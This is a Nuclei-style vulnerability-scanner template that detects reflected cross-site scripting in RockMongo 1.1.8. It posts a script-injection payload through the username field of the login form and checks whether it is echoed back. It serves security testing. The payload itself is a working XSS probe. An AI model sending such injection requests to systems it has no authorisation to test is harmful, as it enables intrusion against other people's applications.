id: rockmongo-xss

info:
  name: RockMongo V1.1.8 XSS
  author: pikpikcu
  severity: medium
  description: A vulnerability in RockMongo allows attackers to inject arbitrary javascript into the response returned by the application.
  reference: https://packetstormsecurity.com/files/136658/RockMongo-1.1.8-Cross-Site-Request-Forgery-Cross-Site-Scripting.html
  tags: rockmongo,xss

requests:
  - method: POST
    path:
      - "{{BaseURL}}/index.php?action=login.index"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: "more=0&host=0&username=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=&db=&lang=en_us&expire=3"

    matchers-condition: and
    matchers:

      - type: word
        words:
          - '"><script>alert(document.domain)</script>'
        part: body

      - type: status
        status:
          - 200

      - type: word
        words:
          - 'Content-Type: text/html'
        part: header